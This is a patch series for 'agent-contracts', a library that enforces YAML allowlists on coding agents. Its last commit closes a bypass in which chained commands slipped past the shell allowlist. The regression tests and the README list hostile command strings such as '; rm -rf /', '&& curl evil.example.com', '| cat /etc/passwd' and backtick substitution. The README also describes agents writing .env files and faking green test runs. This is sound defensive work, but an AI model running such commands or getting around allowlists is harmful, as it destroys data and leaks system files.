test_from_file(self, guard) -> None: - assert guard.enforcer is not None - - def test_validate_inputs(self, guard) -> None: - errors = guard.validate_inputs({"query": "hello"}) - assert errors == [] - - def test_check_authorized_tool(self, guard) -> None: - guard.check_tool("search") - - def test_check_unauthorized_tool(self, guard) -> None: - with pytest.raises(ContractViolation): - guard.check_tool("evil_tool") - - def test_execute_crew(self, guard) -> None: - mock_crew = MagicMock() - mock_crew.kickoff.return_value = "result" - result = guard.execute(mock_crew, inputs={"query": "test"}) - assert result == "result" - mock_crew.kickoff.assert_called_once() - - def test_execute_with_invalid_input(self, tmp_path, tier1_data) -> None: - tier1_data["inputs"]["schema"]["required"] = ["query"] - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - guard = ContractGuard.from_file(p, violation_destination="callback", - violation_callback=lambda e: None) - mock_crew = MagicMock() - with pytest.raises(ContractViolation, match="Input validation"): - guard.execute(mock_crew, inputs={"wrong_field": "test"}) - - def test_wrap_tool(self, guard) -> None: - def my_tool(x: int) -> int: - return x * 2 - - wrapped = guard.wrap_tool(my_tool, "search") - assert wrapped(5) == 10 - - def test_wrap_unauthorized_tool(self, guard) -> None: - def my_tool() -> str: - return "result" - - wrapped = guard.wrap_tool(my_tool, "unauthorized_tool") - with pytest.raises(ContractViolation): - wrapped() - - def test_violations_tracked(self, guard) -> None: - try: - guard.check_tool("bad") - except ContractViolation: - pass - assert len(guard.violations) == 1 diff --git a/tests/test_adapters/test_langchain.py b/tests/test_adapters/test_langchain.py index 7c0b25a..164241e 100644 --- a/tests/test_adapters/test_langchain.py +++ b/tests/test_adapters/test_langchain.py @@ -61,3 +61,18 @@ def test_chain_end_postconditions(self, handler) -> None: def test_on_tool_end(self, handler) -> None: handler.on_tool_end("result") # No-op, should not raise + + +class TestRealSDKIntegration: + """Verifies the adapter is a real subclass of the installed + langchain-core BaseCallbackHandler. Skipped if langchain-core absent.""" + + def test_subclass_of_real_base_callback_handler(self, handler) -> None: + callbacks = pytest.importorskip("langchain_core.callbacks") + assert isinstance(handler, callbacks.BaseCallbackHandler) + + def test_hook_method_signatures_present(self) -> None: + callbacks = pytest.importorskip("langchain_core.callbacks") + for name in ("on_tool_start", "on_tool_end", "on_chain_end", "on_llm_end"): + assert hasattr(callbacks.BaseCallbackHandler, name), f"SDK missing {name}" + assert hasattr(ContractCallbackHandler, name), f"adapter missing {name}" diff --git a/tests/test_adapters/test_openai_agents.py b/tests/test_adapters/test_openai_agents.py index 3bc88f4..6918f9f 100644 --- a/tests/test_adapters/test_openai_agents.py +++ b/tests/test_adapters/test_openai_agents.py @@ -101,3 +101,32 @@ def test_on_handoff(self, hooks) -> None: def test_on_llm_start(self, hooks) -> None: run_async(hooks.on_llm_start(None, None, None, None)) + + +class TestRealSDKIntegration: + """Verifies the adapter is a real subclass of the installed SDK's + RunHooks base class. Skipped if openai-agents is not installed.""" + + def test_subclass_of_real_runhooks(self, hooks) -> None: + # agents.RunHooks is a parameterized generic alias + # (RunHooksBase[TContext, Agent]); the actual base class lives in + # agents.lifecycle and is what the adapter must subclass. + pytest.importorskip("agents") + from agents.lifecycle import RunHooksBase + assert issubclass(ContractRunHooks, RunHooksBase) + assert isinstance(hooks, RunHooksBase) + + def test_hook_method_signatures_present(self) -> None: + pytest.importorskip("agents") + from agents.lifecycle import RunHooksBase + for name in ( + "on_tool_start", + "on_tool_end", + "on_llm_start", + "on_llm_end", + "on_agent_start", + "on_agent_end", + "on_handoff", + ): + assert hasattr(RunHooksBase, name), f"SDK is missing {name}" + assert hasattr(ContractRunHooks, name), f"adapter is missing {name}" diff --git a/tests/test_adapters/test_pydantic_ai.py b/tests/test_adapters/test_pydantic_ai.py deleted file mode 100644 index 3972a62..0000000 --- a/tests/test_adapters/test_pydantic_ai.py +++ /dev/null @@ -1,58 +0,0 @@ -"""Tests for Pydantic AI adapter.""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Dict - -import pytest -import yaml - -from agent_contracts.adapters.pydantic_ai import ContractMiddleware -from agent_contracts.enforcer import ContractViolation - - -@pytest.fixture -def middleware(tmp_path: Path, tier1_data: Dict[str, Any]) -> ContractMiddleware: - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - return ContractMiddleware.from_file(p, violation_destination="callback", - violation_callback=lambda e: None) - - -class TestContractMiddleware: - def test_from_file(self, middleware) -> None: - assert middleware.enforcer is not None - - def test_check_authorized_tool(self, middleware) -> None: - middleware.check_tool("search") - - def test_check_unauthorized_tool(self, middleware) -> None: - with pytest.raises(ContractViolation): - middleware.check_tool("evil_tool") - - def test_validate_result(self, middleware) -> None: - errors = middleware.validate_result({"result": "ok"}) - assert errors == [] - - def test_wrap_tool(self, middleware) -> None: - def search(q: str) -> str: - return f"found: {q}" - - wrapped = middleware.wrap_tool(search, "search") - assert wrapped("test") == "found: test" - - def test_wrap_unauthorized_tool(self, middleware) -> None: - def bad_tool() -> str: - return "nope" - - wrapped = middleware.wrap_tool(bad_tool, "unauthorized") - with pytest.raises(ContractViolation): - wrapped() - - def test_violations_tracked(self, middleware) -> None: - try: - middleware.check_tool("bad") - except ContractViolation: - pass - assert len(middleware.violations) == 1 From 8b5ee9040d7f0e99103445ecac53701f77b1eb7c Mon Sep 17 00:00:00 2001 From: Piyush Vyas Date: Mon, 6 Apr 2026 16:00:14 -0500 Subject: [PATCH 3/4] docs(readme): add "Why YAML, not Markdown?" design rationale section Explains why the contract is a structured YAML artifact rather than prose: deterministic parse, typed fields for fail-closed enforcement, diff-friendly review, versioned schema, and consistency with existing cloud-native policy formats. Co-Authored-By: Claude Opus 4.6 (1M context) --- README.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/README.md b/README.md index 22f55db..c8f7bf7 100644 --- a/README.md +++ b/README.md @@ -214,6 +214,19 @@ action.yml GitHub composite action AGENT_CONTRACT.yaml Canonical coding-agent contract ``` +## Why YAML, not Markdown? + +A contract is a machine-enforceable artifact, not documentation. Markdown is prose; YAML is structure. The difference matters when the same file has to be parsed by a CLI, an in-runtime enforcer, and a CI gate — and produce the same verdict every time. + +- **Deterministic parse.** YAML has a JSON Schema (`schemas/agent-contract.schema.json`). Every runtime, in any language, produces the same parse tree from the same file. Markdown would require an LLM or a brittle regex extractor, and the verdict would depend on which extractor you used. +- **Fail-closed needs typed fields.** `effects.authorized.filesystem.write: ["src/**"]` is a list of glob patterns. There is no ambiguity about whether `tests/secret.env` is in scope. A Markdown bullet under "## Files the agent can write" is interpretation, and interpretation is exactly what coding-agent guardrails cannot afford. +- **Diff-friendly review.** YAML diffs per field. A reviewer can see "this PR added `python -m mypy *` to authorized shell commands" as a one-line change. Markdown prose diffs are noisy and merge conflicts on policy text are hard to reason about. +- **Versioned schema.** `agent_contract: "0.1.0"` declares the spec version. Older runtimes can refuse contracts they don't understand; newer runtimes can ignore unknown fields under the `x-` prefix. Markdown has no equivalent. +- **Cloud-native muscle memory.** kubectl, GitHub Actions, OpenAPI, Helm, GitLab CI, ArgoCD — every fail-closed policy artifact in the ecosystem is YAML or JSON. Engineers already know how to author, lint, and review it. +- **Still legible.** For the canonical coding-agent case (one identity block, one effects block, a few postconditions), the YAML is short enough to read without ceremony. The quick-start contract above fits on one screen. + +Markdown is the right format for the *human spec* (`spec/SPECIFICATION.md`) and for prose explanations of how the system works. It is not the right format for the file the enforcer reads on every run. + ## Scope and non-goals This repo is intentionally narrow. From 1a73734d91844203db21111aea757ad7cb8aa319 Mon Sep 17 00:00:00 2001 From: Piyush Vyas Date: Tue, 7 Apr 2026 01:43:30 -0500 Subject: [PATCH 4/4] sec(effects): strict-reject shell metacharacters; rewrite README for launch MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Security fix ============ The shell command matcher used fnmatch.fnmatch(). Pattern "python -m pytest *" matched commands like "python -m pytest tests/ ; rm -rf /" because the * glob consumed shell operators (;, &&, ||, |, &, >, <, `, $(, newline) as ordinary characters. An agent could bypass any allowlist entry by appending arbitrary chained or substituted commands after an authorized prefix. v0.2.x now strict-rejects any command containing one of those metacharacters, regardless of pattern match. New ShellMetacharacterError subclasses EffectDeniedError so existing handlers keep working but verdicts can distinguish "matched no allowlist entry" from "attempted to chain commands". Regression coverage in tests/test_effects.py covers ;, &&, ||, |, >, <, >>, $(, backtick, newline, and trailing &. A future v0.3.x may introduce a shlex-based token matcher for richer command shapes; until then, strict reject is the only correct fail-closed behavior. The README now documents the threat model and the trade-off explicitly. README rewrite for launch ========================= - New headline: "Declare what your coding agent may read, write, run, and spend — in one YAML file. Enforced at runtime. Gated in CI. Fails closed." - New "Why this, why now" section grounding urgency in 2026 coding-agent failure modes (Claude Code, Codex, Cursor, Devin, Aider). - New "What an agent cannot do under a contract" before/after table making every abstract term concrete (.env writes, rm -rf, shell injection, unauthorized network, token overruns, fake green runs). - Step 2 of the quick start now shows the Claude Agent SDK adapter forwarding tool calls into the enforcer, instead of manual enforcer.check_file_read() calls that made it look like the user was the enforcer. - Quick start contract trimmed to drop redundant enforcement: sync_block and severity: critical fields (sensible defaults). - aicontracts init template emits the trimmed shape too, so the README matches what `init --template coding -o AGENT_CONTRACT.yaml` actually writes. - All CLI examples now use the `aicontracts` console script instead of `python -m agent_contracts.cli`. - Verdict artifact JSON example pruned (drops final_gate, tool_calls). - New "Shell command matching: threat model" section documents the strict-reject behavior and the v0.3.x roadmap for token-based matching. Tests ===== 196 tests pass on Python 3.12 with [dev,claude,openai,langchain] installed (was 183, +13 shell bypass regression cases). All 5 real-SDK integration tests still pass. Lint + mypy clean. Co-Authored-By: Claude Opus 4.6 (1M context) --- CHANGELOG.md | 4 + README.md | 141 +++++++++++++++++++-------------- src/agent_contracts/cli.py | 4 - src/agent_contracts/effects.py | 69 +++++++++++++++- tests/test_effects.py | 47 +++++++++++ 5 files changed, 198 insertions(+), 67 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 384eb3d..63b9741 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -26,3 +26,7 @@ All notable changes to this project are tracked here. - CrewAI adapter and `[crewai]` extra - Pydantic AI adapter and `[pydantic-ai]` extra + +### Security + +- shell command authorization now strict-rejects any command containing a shell metacharacter (`;`, `&`, `|`, `<`, `>`, `` ` ``, `$(`, newline). Closes a bypass where the fnmatch `*` wildcard would consume chaining operators and let an attacker append payloads after an allowlisted prefix (e.g. `python -m pytest tests/ ; rm -rf /`). The new `ShellMetacharacterError` is a subclass of `EffectDeniedError` so existing handlers keep working. Regression coverage in `tests/test_effects.py`. diff --git a/README.md b/README.md index c8f7bf7..98f6860 100644 --- a/README.md +++ b/README.md @@ -1,58 +1,58 @@ -# Agent Contracts +# agent-contracts [![CI](https://github.com/pyyush/agentcontracts/actions/workflows/ci.yml/badge.svg)](https://github.com/pyyush/agentcontracts/actions/workflows/ci.yml) +[![PyPI](https://img.shields.io/pypi/v/aicontracts.svg)](https://pypi.org/project/aicontracts/) -**Repo-local, fail-closed guardrails for autonomous coding/build agents.** +**Declare what your coding agent may read, write, run, and spend — in one YAML file at the root of your repo. Enforced at runtime. Gated in CI. Fails closed.** -`agent-contracts` lets a repository declare what an agent may read, write, run, call, and spend — and then emit one durable verdict artifact showing whether the run passed, warned, blocked, or failed. - -The contract, CLI, verdict artifact, and GitHub Action are **framework-agnostic and provider-agnostic by design** — they don't depend on any agent SDK or model provider. Optional adapters for Claude Agent SDK, OpenAI Agents SDK, and LangChain are thin ergonomic helpers that forward in-runtime hook calls into the same enforcer. - -> **The CI verdict gate is the source of truth.** The merge cannot go green if the verdict is `blocked` or `fail`. In-runtime adapters add convenience — the gate is what makes enforcement complete. +Works with Claude Code, Codex, Cursor, and any agent runtime — the core is framework- and provider-agnostic. Optional thin adapters for Claude Agent SDK, OpenAI Agents SDK, and LangChain. ```bash pip install aicontracts +aicontracts init --template coding -o AGENT_CONTRACT.yaml +aicontracts validate AGENT_CONTRACT.yaml ``` -## What it solves +> **The CI verdict gate is the source of truth.** Every run emits one durable `verdict.json`. The merge cannot go green if the verdict is `blocked` or `fail`. In-runtime adapters add convenience — the gate is what makes enforcement complete. + +## Why this, why now + +Coding agents are in production. Claude Code, Codex, Cursor Agent, Devin, Aider — every one of them runs with ambient authority over your repo: whatever the shell, filesystem, and network will let them do. The failure modes are no longer hypothetical: + +- agents editing files outside the intended scope +- destructive shell commands run on the wrong branch +- silent token-budget overruns mid-loop +- the agent reports "all tests passing" while `pytest` on disk is red — and you merge it +- unauthorized network calls and tool use buried in the trace -Without a repo-local contract, coding agents usually run with ambient authority. -That creates five common failure modes: +A repo shouldn't trust an agent any more than it trusts a random PR. `agent-contracts` is the smallest thing that gives a repo a declarative *"here is exactly what this agent may do"* — and a CI gate that refuses to merge runs that violated it. -- edits outside the intended file scope -- forbidden shell commands -- unauthorized tool or network calls -- silent budget overruns -- fake green runs when repo checks are red +## What an agent cannot do under a contract -Agent Contracts keeps the scope narrow: +| Agent attempts | Without a contract | With agent-contracts | +|---|---|---| +| `Write(".env", ...)` | silently succeeds | not in `filesystem.write` → denied | +| `Bash("rm -rf node_modules")` | runs | not in `shell.commands` → denied | +| `Bash("python -m pytest tests/ ; rm -rf /")` | runs | shell metacharacter → denied | +| Fetches `https://evil.example.com` | runs | not in `network` → denied | +| Burns 200k tokens in a loop | silent | hits `max_tokens: 50000` → blocked | +| Reports "all tests passing" while pytest is red | merges green | postcondition fails → verdict: `fail`, CI gate red | -> declare the repo-local contract, enforce it at runtime and in CI, and fail closed with a verdict artifact. +## Quick start -## 5-minute quick start +### 1. Generate a starter contract -### 1. Write a coding-agent contract +```bash +aicontracts init --template coding -o AGENT_CONTRACT.yaml +``` + +This drops a ready-to-use coding-agent contract in your repo: ```yaml -# AGENT_CONTRACT.yaml agent_contract: "0.1.0" - identity: name: repo-build-agent version: "0.1.0" - description: Safe coding/build agent for this repository. - -contract: - postconditions: - - name: produces_output - check: "output is not None" - enforcement: sync_block - severity: critical - - - name: repo_checks_green - check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" - enforcement: sync_block - severity: critical effects: authorized: @@ -76,37 +76,47 @@ resources: observability: run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" + +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" ``` -### 2. Enforce it in the agent runtime +Empty `tools`, `network`, and `state_writes` lists mean *default-deny*: the agent cannot use any tool, hit any network endpoint, or write to any tracked state unless you list it. -```python -from agent_contracts import ContractEnforcer, load_contract +### 2. Hook it into your agent runtime -contract = load_contract("AGENT_CONTRACT.yaml") +The Claude Agent SDK adapter forwards every tool call into the enforcer — no manual instrumentation: -with ContractEnforcer(contract, host_name="codex") as enforcer: - enforcer.check_file_read("src/app.py") - enforcer.check_file_write("src/app.py") - enforcer.check_shell_command("python -m pytest tests/test_app.py") +```python +from agent_contracts import load_contract +from agent_contracts.adapters.claude_agent import ContractHooks +from claude_agent_sdk import ClaudeAgentOptions, query - result = {"status": "done"} +contract = load_contract("AGENT_CONTRACT.yaml") +hooks = ContractHooks(contract) - enforcer.record_check("pytest", "pass", exit_code=0) - enforcer.record_check("ruff", "pass", exit_code=0) - verdict = enforcer.finalize_run(output=result) +options = ClaudeAgentOptions(hooks=hooks.get_hooks_config()) +async for message in query(prompt="refactor src/app.py", options=options): + if hasattr(message, "total_cost_usd"): + hooks.track_result(message) -print(verdict.outcome) # pass | warn | blocked | fail -print(verdict.artifacts) # includes verdict artifact path +verdict = hooks.enforcer.finalize_run(output={"status": "done"}) +print(verdict.outcome) # pass | warn | blocked | fail ``` +OpenAI Agents SDK and LangChain adapters follow the same pattern. For agents *without* an SDK hook surface (bash drivers, custom subprocess loops), the verdict gate in step 3 still catches every violation post-hoc. + ### 3. Gate the verdict in CI ```bash -python -m agent_contracts.cli validate AGENT_CONTRACT.yaml -python -m agent_contracts.cli check-verdict .agent-contracts/runs//verdict.json +aicontracts validate AGENT_CONTRACT.yaml +aicontracts check-verdict .agent-contracts/runs//verdict.json ``` +`check-verdict` exits non-zero on `blocked` or `fail`. Wire it into a required GitHub check and the merge cannot proceed without an honest contract pass. + ## Verdict artifacts Every meaningful run can emit one compact artifact, for example: @@ -115,14 +125,12 @@ Every meaningful run can emit one compact artifact, for example: { "run_id": "...", "outcome": "pass", - "final_gate": "allowed", "checks": [ {"name": "pytest", "status": "pass", "exit_code": 0}, {"name": "ruff", "status": "pass", "exit_code": 0} ], "budgets": { "tokens": 12345, - "tool_calls": 0, "shell_commands": 2, "duration_seconds": 18.2 }, @@ -141,19 +149,19 @@ Outcome semantics: ```bash # Validate a contract and show coding/build surfaces -python -m agent_contracts.cli validate AGENT_CONTRACT.yaml +aicontracts validate AGENT_CONTRACT.yaml -# Check composition compatibility -python -m agent_contracts.cli check-compat producer.yaml consumer.yaml +# Generate a coding-agent starter template +aicontracts init --template coding -o AGENT_CONTRACT.yaml # Bootstrap from traces -python -m agent_contracts.cli init --from-trace traces.jsonl -o AGENT_CONTRACT.yaml +aicontracts init --from-trace traces.jsonl -o AGENT_CONTRACT.yaml -# Generate a coding-agent starter template -python -m agent_contracts.cli init --template coding +# Check composition compatibility +aicontracts check-compat producer.yaml consumer.yaml -# Gate a verdict artifact in CI -python -m agent_contracts.cli check-verdict .agent-contracts/runs//verdict.json +# Gate a verdict artifact in CI (exits non-zero on blocked/fail) +aicontracts check-verdict .agent-contracts/runs//verdict.json ``` ## Framework adapters (optional) @@ -174,6 +182,19 @@ In-runtime adapters add hard-stop coverage where the host exposes a pre-executio A companion `@aicontracts/*` TypeScript package with adapters for Vercel AI SDK, Claude TypeScript SDK, and OpenAI Agents JS is planned for v0.3.0. +## Shell command matching: threat model + +Shell command authorization in v0.2.x is **strict reject + glob match**. Any command containing a shell metacharacter — `;` `&` `|` `<` `>` `` ` `` `$(` or a newline — is denied outright, even if its prefix matches an allowlisted pattern. This rules out command chaining, redirection, process substitution, and command injection at the contract layer. + +```yaml +shell: + commands: + - "python -m pytest *" # matches: python -m pytest tests/test_app.py + # denied: python -m pytest tests/ ; rm -rf / +``` + +The trade-off: legitimate piped commands like `cat file | head` cannot be expressed as a single allowlist entry today. Wrap them in a script the contract authorizes by name, or split them into two records. v0.3.x will introduce a `shlex`-based token matcher that can express richer command shapes safely without weakening the fail-closed property. + ## GitHub Action ```yaml diff --git a/src/agent_contracts/cli.py b/src/agent_contracts/cli.py index fe89f54..2580ed2 100644 --- a/src/agent_contracts/cli.py +++ b/src/agent_contracts/cli.py @@ -232,8 +232,6 @@ def init( { "name": "repo_checks_green", "check": "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", - "enforcement": "sync_block", - "severity": "critical", } ] }, @@ -251,8 +249,6 @@ def init( { "name": "produces_output", "check": "output is not None", - "enforcement": "sync_block", - "severity": "critical", } ] }, diff --git a/src/agent_contracts/effects.py b/src/agent_contracts/effects.py index a207faf..57dfb03 100644 --- a/src/agent_contracts/effects.py +++ b/src/agent_contracts/effects.py @@ -18,6 +18,30 @@ ShellAuthorization, ) +# Shell metacharacters that enable command chaining, redirection, or +# substitution. Any command containing one of these is rejected outright +# in v0.2.x, regardless of pattern match. The fail-closed contract has +# no safe way to express "this prefix is allowed but only without an +# appended `; rm -rf /`" using fnmatch globs, because `*` would consume +# the operator and the payload as ordinary characters. +# +# v0.3.x will introduce a shlex-based token matcher that can express +# richer command shapes safely; until then, strict reject is the only +# correct fail-closed behavior. +_SHELL_METACHARS = frozenset(";&|<>`\n") +_SHELL_METASEQUENCES = ("$(",) + + +def _shell_metachar_in(command: str) -> Optional[str]: + """Return the first shell metacharacter found, or None.""" + for ch in command: + if ch in _SHELL_METACHARS: + return ch + for seq in _SHELL_METASEQUENCES: + if seq in command: + return seq + return None + class EffectDeniedError(Exception): """Raised when a tool call or effect is not authorized.""" @@ -32,6 +56,29 @@ def __init__(self, effect_type: str, name: str, allowed: Sequence[str]) -> None: ) +class ShellMetacharacterError(EffectDeniedError): + """Raised when a shell command contains a chaining/redirection/ + substitution metacharacter. Distinct from a plain authorization + failure so callers and verdict artifacts can distinguish 'matched + no allowlist entry' from 'attempted to chain commands'.""" + + def __init__(self, command: str, metachar: str, allowed: Sequence[str]) -> None: + self.metachar = metachar + self.command = command + super().__init__( + "shell.command", + command, + allowed, + ) + # Override the message to surface the bypass attempt explicitly. + self.args = ( + f"shell.command '{command}' rejected: contains shell metacharacter " + f"'{metachar}'. Command chaining, redirection, and substitution are " + f"not permitted under v0.2.x effect authorization. " + f"Authorized patterns: {list(allowed) if allowed else '(none)'}", + ) + + def matches_any(name: str, patterns: Sequence[str]) -> bool: """Check if a name matches any of the given glob patterns.""" return any(fnmatch.fnmatch(name, pattern) for pattern in patterns) @@ -109,9 +156,21 @@ def check_file_write(self, path: str) -> bool: def check_shell_command(self, command: str) -> bool: if self._authorized is None or self._authorized.shell is None: return True + # Strict reject: any chaining/redirection/substitution metachar + # bypasses fnmatch's `*` and would let an attacker append payloads + # after an allowlisted prefix. Scan the RAW command (not the + # whitespace-normalized form) so newlines are not lost. + if _shell_metachar_in(command) is not None: + return False normalized = self._normalized_command(command) return matches_any(normalized, self._authorized.shell.commands) + def shell_command_metachar(self, command: str) -> Optional[str]: + """Return the first shell metacharacter in the command, or None. + Exposed so callers can distinguish 'unauthorized' from 'rejected + as a chaining attempt' when constructing verdicts.""" + return _shell_metachar_in(command) + def require_tool(self, tool_name: str) -> None: if not self.check_tool(tool_name): raise EffectDeniedError( @@ -152,10 +211,14 @@ def require_file_write(self, path: str) -> None: def require_shell_command(self, command: str) -> None: if not self.check_shell_command(command): - allowed = [] + allowed: List[str] = [] if self._authorized is not None and self._authorized.shell is not None: - allowed = self._authorized.shell.commands - raise EffectDeniedError("shell.command", self._normalized_command(command), allowed) + allowed = list(self._authorized.shell.commands) + metachar = _shell_metachar_in(command) + normalized = self._normalized_command(command) + if metachar is not None: + raise ShellMetacharacterError(normalized, metachar, allowed) + raise EffectDeniedError("shell.command", normalized, allowed) def intersect_authorized(parent: EffectsAuthorized, child: EffectsAuthorized) -> EffectsAuthorized: diff --git a/tests/test_effects.py b/tests/test_effects.py index 672a9fa..f826bf4 100644 --- a/tests/test_effects.py +++ b/tests/test_effects.py @@ -7,6 +7,7 @@ from agent_contracts.effects import ( EffectDeniedError, EffectGuard, + ShellMetacharacterError, intersect_authorized, union_declared, validate_declared_subset, @@ -73,6 +74,52 @@ def test_shell_command_checks(self) -> None: assert guard.check_shell_command("python -m pytest tests/test_app.py") is True assert guard.check_shell_command("python -m mypy src") is False + @pytest.mark.parametrize( + "command", + [ + "python -m pytest tests/ ; rm -rf /", + "python -m pytest tests/ && curl evil.example.com", + "python -m pytest tests/ || echo pwned", + "python -m pytest tests/ | cat /etc/passwd", + "python -m pytest tests/ > /etc/hosts", + "python -m pytest tests/ < /dev/urandom", + "python -m pytest tests/ >> /var/log/owned", + "python -m pytest $(echo tests)", + "python -m pytest `whoami`", + "python -m pytest tests/\nrm -rf /", + "python -m pytest tests/ &", + ], + ) + def test_shell_metacharacter_bypass_denied(self, command: str) -> None: + """Regression: fnmatch's `*` wildcard would otherwise consume shell + operators and let an attacker append payloads after an allowlisted + prefix. The strict reject must catch every chaining vector.""" + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + assert guard.check_shell_command(command) is False + with pytest.raises(ShellMetacharacterError) as exc_info: + guard.require_shell_command(command) + assert "metacharacter" in str(exc_info.value) + + def test_shell_metacharacter_error_is_effect_denied(self) -> None: + """ShellMetacharacterError must be catchable as EffectDeniedError so + existing handlers keep working.""" + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + with pytest.raises(EffectDeniedError): + guard.require_shell_command("python -m pytest tests/ ; rm -rf /") + + def test_shell_metachar_introspection(self) -> None: + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + assert guard.shell_command_metachar("python -m pytest tests/") is None + assert guard.shell_command_metachar("python -m pytest a ; b") == ";" + assert guard.shell_command_metachar("python -m pytest $(b)") == "$(" + assert guard.shell_command_metachar("python -m pytest a\nb") == "\n" + def test_empty_allowlist_denies_all(self) -> None: guard = EffectGuard(EffectsAuthorized(tools=[], network=[], state_writes=[])) assert guard.check_tool("anything") is False